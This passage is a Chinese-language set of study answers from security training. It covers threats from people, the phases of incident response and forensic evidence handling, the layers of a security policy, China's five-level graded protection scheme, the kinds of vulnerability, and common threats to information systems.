    ④人员因素。是造成安全威胁的最主要因素。通常,人员因素导致的安全威胁分为恶意攻击者导致的安全威胁和无恶意的人员导致的安全威胁。
    典型的恶意攻击者造成的安全威胁是:
    A、道德品质低下。攻击者实施以诈骗、盗窃或报复为目的攻击,尤其以报复为目的攻击对组织来说最为危险。
    B、伪装或欺骗。其核心在于通过伪装和欺骗来获取攻击者所需要的信息。
    C、拒绝服务攻击。攻击者的目的是为了干扰正常的组织运作,借此达到攻击的目的。
    典型的无恶意的人员者造成的安全威胁是:
    A、突发事故。突发事故可能导致设备损坏或线路故障等。
    B、缺少安全意识。组织成员缺乏必要的安全意识,不曾接受过必要的安全培训。
    C、工作负担不合理。参与安全工作的工作人员与工作量不能较好匹配,协同工作能力低下或者工作流程分配不合理,可能造成设备的配置错误,也可能出现工作人员相互推卸责任。
    2、论述系统突发事件响应策略的主要内容和实现方式。
    是提前设计好的,并需要对所有可能突发事件情况进行推测和预测制定的行动方案。一般覆盖事件发生的几个阶段。包括:准备阶段、识别事件、检测和调查、限制、修复和消除、后续步骤。
    (1)准备阶段
    员工提前接受对应对突发事件的培训,以理解在突发事件发生后的报告链或命令链,并能够按照预定方案进行行动。另外,购置应对处置突发事件时所使用的必要设备(如检测、限制和恢复工具等)。具体准备工作有:
    成立突发事件响应工作专家小组,可以是临时的,也可以是常设的。一般由领导、网络系统安全分析人员、(临时或永久的)法律专家组成。进行紧急决策、事件技术分析、指导取证及保留和诉讼、及时准确的信息发布公开等工作的展开。
    (2)识别事件
    是进行安全事件响应流程的起点和第一步骤。如出现对网络的嗅探或端口扫描,可能是发动一次大规模攻击的前兆,如果在此阶段就能准确识别事件,就可以采取一定的措施避免攻击的进一步扩大。但是,安全人员在没有确定一个安全事件发生之前,就贸然地进入处理安全事件的紧急状态,也是一个非常糟糕的决定。因为一次普通的ping操作或一个简单的http连接都有可能造成误报。而IDS虽可以检测一些事件的发生,但可能这些事件不一定是安全事件或潜在的攻
    击威胁。只能进行初步的筛选,还须进一步手工检查和识别。所以,参与识别的人员应该包括系统管理员和网络管理员,如果识别确实是一个攻击或安全事件,及时提高警戒级别,报告相关高层人员,按照预定处置方案进行处理,包括招集事件响应小组,分配相关资源等行动。
    (3)调查与检测
    是进行安全事件响应流程的起点和第一步骤。其主要任务是对事件中涉及的日志、文件、记录及其相关资料和数据进行研究和分析,从而最终确定事件发生的原因和事件的影响范围。调查的结果最终能够判定安全事件到底是一次攻击还是一次更大规模攻击的前夕;是一次随机事件还是一次误报;安全事件发生的原因和诱因何在?对引发事件的原因进行分类,并判定该次安全事件对整个网络造成的影响进行评估,为下一步的修复提供参考。故准确地发现安全事件的原因,对修复和预防具有重要的作用。
    如:在诸多引发安全事件的原因中,病毒和恶意代码通常是最为普遍的,一般用户做不到像安全人员那样敏感,无意中引发病毒或安装木马程序。一般可以采取借助软件包分析工具或反病毒软件来识别病毒,查杀之。
    (4)限制、修复和消除
    ①限制事件的影响和发展:限制安全事件的进一步发展和造成的负面影响。常采取以下的限制活动:
    A、通知并警告攻击者。对于内部攻击或已知来源于外部的攻击,可直接对攻击者发出警告,并同时切断他与网络的连接。如需进一步对其进行起诉,应征询法律顾问的意见后,并在收集证据中使用经过取证培训的人员
    B、切断攻击者与网络系统的通信:是最为普通的做法,也是最快捷的响应方式。例如:通过添加或修改防火墙的过滤规则,对路由或IDS增加规则,停用特定的软件或硬件组件。若攻击者是通过特定的账户获得非授权访问时,则通过禁用或删除这个账户的方法进行限制。
    C、对事件来源进行分析:通过分析事件,找出当前系统中存在的不足之处,并通过必要的手段暂堵住这一漏洞。例如:入侵者是通过软件系统的漏洞进入系统的,则通过给软件系统加装补丁的方式将其限制。
    另外,当安全管理员恢复系统和进行漏洞补丁时,往往需要暂切断与网络(或INTERNET互联)的连接,这时用户不能获得网络服务,将导致正常工作或经济
    和信誉上的重大损失,此时,需要在保障安全与经济利益之间做出选择。
    ②修复系统:指恢复机构和组织在攻击之前的正常处理方案。它包括重新设置权限并填补漏洞;逐步恢复服务。严重时,启动灾难恢复计划(DRP),调取异地备份资料等。DRP是安全流程中的一个重要组成部分。
    ③消除事件的影响:消除攻击事件或攻击者给网络系统造成的影响。主要包括:
    A、统一的补丁或升级:对补丁进行测试,确定无误后,才能对系统进行大规模、大批量的打补丁操作,对软件或硬件进行统一的升级或补丁。
    B、清查用户账户和文件资源:若攻击者采用的是超越权限或漏洞用户等方式,则清理相关账户,对攻击发生后的建立的用户账户进行详细的检查。若攻击事件是病毒或恶意代码引起的,一般应检查关键文件的健康状况,防止有计算机病毒或木马程序潜伏。禁用一些不必要的账户。
    C、检查物理设备:如果攻击者采用物理方式或社会工程学方式进行攻击,须彻底检查物理设备。如果发现有遭受损坏、破坏的,应及时修复或处理,并作出相应的措施防止再次发生。
    ④后续阶段。由多项任务组成。包括:
    A、记录和报告。在在整个事件响应过程中,都应进行详细记录。包括辨识事件、调查事件、响应步骤、修复系统、改进意见等一系列步骤。它对今后应对类似攻击时,将是非常宝贵的资料。如果需要借助法律程序,则还须提供额外的、符合法律规范的报告文档。另外,这些收集的资料,除了提交给高层管理者外,同时可提供给其他组织成员进行警示和提醒,必要时可充时到相关的安全培训教材中。这是某种意义上知识共享的重要组成部分。
    B、过程调整(即流程调整)。它包括:
    当前的相关政策是否对本次发生的安全事件的解决的帮助?政策起到何种支持作用;
    在本次事件的处理中,学习到哪些新的经验与教训;
    若再次发生类似事件,今后应如何应对?效果又会有何区别。
    ⑤取证和保存证据。事件发生后,采取获取和保存具法律效力的证据或事实证明的一系列行为。一般在事件发生后,希望提起诉讼、追查攻击者以至于获得赔偿所必须的手段。
    计算机证据具有与其它证据不具有的特点。即往往不能被直接感受到;通常
    是书面的证据。所以,获取证据时需要格外注意以下几点:
    A、发生攻击后,应在第一时间保护计算机的软件、硬件环境。如立即进行当前系统快照、切断网络和远程连接、记录电子邮件、Web和DNS的当前cache等。若技术能力有限,可聘请或咨询专业的取证技术人员进行证据的保存工作。
    B、收集证据时必须进行适当的标记,如标记发现者、被发现日期、时间、地点等信息。
    C、保护证据还会受到过冷、过热、潮湿、静电、电磁和震动的影响。若暂时不需要运输和传送的,应保存在物理访问受限制和进行物理访问受控制的环境中。
    D、分析调查时,尽量采用原始证据的副本(如磁盘镜像、系统快照等),不要使用原始证据设备。但镜像制作时,应采用按位复制或按扇区复制等较为低级的复制方法,并制作散列摘要。同时,保持证据的连续性((取证链完整)。如一系列的人和事物能够证明获得的证据,在什么时间、什么地点、存储在何处、谁控制的拥有证据等。因为,一旦不能保证证据的连续性,该证据可能将不被法律机构认同或接受。

    1. 简述安全策略体系所包含的内容。
      答:一个合理的信息安全策略体系可以包括三个不同层次的策略文档:
      (1)总体安全策略,阐述了指导性的战略纲领性文件,阐明了企业对于信息安全的看法和立场、信息安全的目标和战略、信息安全所涉及的范围、管理组织构架和责任认定以及对于信息资产的管理办法等内容;
      (2)针对特定问题的具体策略,阐述了企业对于特定安全问题的声明、立场、使用办法、强制要求、角色、责任认定等内容,例如,针对Internet访问操作、计算机和网络病毒
      防治、口令的使用和管理等特定问题,制定有针对性的安全策略;
      (3)针对特定系统的具体策略,更为具体和细化,阐明了特定系统与信息安全有关的使用和维护规则等内容,如防火墙配置策略、电子邮件安全策略等。
    2. 简述我国信息安全等级保护的级别划分。
      答: (1)第一级为自我保护级。其主要对象为一般的信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对公民、法人和其它组织的合法权益产生损害,但不损害国家安全、社会秩序和公共利益;本级系统依照国家管理规范和技术标准进行自主保护。
      (2)第二级为指导保护级。其主要对象为一般的信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对社会秩序和公共利益造成轻微损害,但不损害国家安全;本级系统依照国家管理规范和技术标准进行自主保护,必要时,信息安全监管职能部门对其进行指导。
      (3)第三级为监管保护级。其主要对象为涉及国家安全、社会秩序和公共利益的主要信息系统,器业务信息安全性或业务服务保证性受到破坏后,会对国家安全、社会秩序和公共利益造成较大损害;本机系统依照国家管理规范和技术标准进行自主保护,信息安全监管职能部门对其进行监督、检查。
      (4)第四级为强制保护级。其主要对象为涉及国家安全、社会秩序和公共利益的主要信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对国家安全、社会秩序和公共利益造成严重损害;本级系统依照国家管理规范和技术标准进行自主保护,信息安全监管职能部门对其进行强制监督、检查。
      (5)第五级为专控保护级。其主要对象为涉及国家安全、社会秩序和公共利益的重要信息系统的核心子系统,其业务信息安全性或业务服务保证性受到破坏后,会对国家安全社会秩序和公共利益造成特别严重损害;本级系统依照国家管理规范和技术标准进行自主保护,国家指定专门部门、专门机构进行专门监督、检查。
    3. 简述信息安全脆弱性的分类及其内容。
      答:信息安全脆弱性的分类及其内容如下所示;
      脆弱性分类:
      一、技术脆弱性
      1、物理安全:物理设备的访问控制、电力供应等
      2、网络安全:基础网络构架、网络传输加密、访问控制、网络设备安全漏洞、设备配置安全等
      3、系统安全:应用软件安全漏洞、软件安全功能、数据防护等
      4、应用安全:应用软件安全漏洞、软件安全功能、数据防护等
      二、管理脆弱性
      安全管理:安全策略、组织安全、资产分类与控制、人员安全、物理与环境安全、通信与操作管理、访问控制、系统开发与维护、业务连续性、符合性
    4. 简述至少4种信息系统所面临的安全威胁。
      答:信息系统所面临的常见安全威胁如下所示:
      软硬件故障:由于设备硬件故障、通信链接中断、信息系统或软件Bug导致对业务、高效稳定运行的影响。
      物理环境威胁:断电、静电、灰尘、潮湿、温度、鼠蚁虫害、电磁干扰、洪灾、火灾、地震等环境条件和自然灾害。
      无作为或操作失误:由于应该执行而没有执行相应的操作,或无意的执行了错误的操作,对系统造成影响。
      管理不到位:安全管理无法落实,不到位,造成安全管理不规范,或者管理混乱,从而破坏信息系统正常有序运行。
      恶意代码和病毒:具有自我复制、自我传播能力,对信息系统构成破坏的程序代码。 越权或滥用:通过采用一些,超越自己的权限访问了本来无权访问的资源;或者滥用自己的职权,做出破坏信息系统的行为。
      黑客攻击技术:利用黑客工具和技术,例如,侦察、密码猜测攻击、缓冲区溢出攻击、安装后门、嗅探、伪造和欺骗、拒绝服务攻击等手段对信息系统进行攻击和入侵。
      物理攻击:物理接触、物理破坏、盗窃。
      泄密:机密信息泄露给他人。
      篡改:非法修改信息,破坏信息的完整性。
      抵赖:不承认收到的信息和所作的操作和交易。
赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » 安全培训理论题の二

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫

微信扫一扫

登录

找回密码

注册